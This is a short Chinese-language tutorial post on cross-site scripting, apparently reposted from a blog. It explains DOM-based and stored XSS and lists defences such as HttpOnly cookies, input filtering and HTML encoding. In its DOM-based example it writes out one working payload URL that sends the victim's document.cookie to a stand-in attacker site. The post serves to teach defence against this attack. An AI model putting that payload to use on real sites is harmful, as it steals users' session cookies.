• XSS跨站脚本攻击

      XSS跨站脚本攻击

      解释:就是攻击者在页面嵌入js代码,盗取被攻击者同浏览器下的cookie信息,跳转到恶意网站,注入木马等,常见的有两种方式:

      《1》Dom-Based XSS 漏洞;

        攻击者A先创建一个http://www.a.com网站,用来接收数据,然后给被攻击者B发送一条链接http://www.b.com?a=<script>window.open("http://www.a.com?cookie="+document.cookie)</script>,B用户访问了这条链接后,浏览器的cookie将传送给攻击者,从而盗取到用户的cookie;

      《2》Stored XSS(存储式XSS漏洞);

        攻击者将攻击脚本上传到web服务器上,用户访问网站时盗取浏览器cookie;如用户在web网站创建一边文章加入了攻击脚本;

      防范措施:

      《1》将重要的cookie标记为http only ,js中的document.cookie就获取不到cookie;

      《2》用户输入的数据进行过滤;

      《3》对数据进行html encode处理;如将“<”转化为&lt;

      《4》过滤或处理特殊的html标签;如script;
  • 相关阅读:
    js中const,var,let区别与用法
    poi excel 导出
    spring 实体类 date类型字段处理
    mysql 1449 : The user specified as a definer ('root'@'%') does not exist
    pjax学习
    上传文件 connection reset
    mysql连接问题
    Scala Actor Model
    Scala 隐式转换
    Scala Trait+Match+Case class+偏函数
  • 原文地址:https://www.cnblogs.com/happy-dream/p/6544367.html
Copyright © 2020-2023  润新知